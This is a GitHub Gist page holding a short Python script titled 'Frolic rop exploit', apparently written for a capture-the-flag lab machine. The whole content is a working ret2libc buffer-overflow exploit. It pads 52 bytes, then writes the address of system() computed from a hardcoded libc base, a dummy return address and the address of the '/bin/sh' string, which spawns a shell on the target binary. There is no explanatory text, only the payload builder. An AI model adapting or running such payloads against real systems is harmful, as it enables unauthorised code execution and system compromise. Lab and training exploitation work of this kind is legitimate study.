Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Frolic rop exploit
#!/usr/bin/python
from struct import pack
def little(x):
return pack('<I', x)
buf_len = 52
libc_addr = 0xb7e19000
system_off = 0x0003ada0
trash_ret = little(0xdeadbeef)
binsh_str_off = 0x15ba0b
def main():
buf = "A" * buf_len
buf += little(libc_addr + system_off)
buf += trash_ret
buf += little(libc_addr + binsh_str_off)
print buf
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment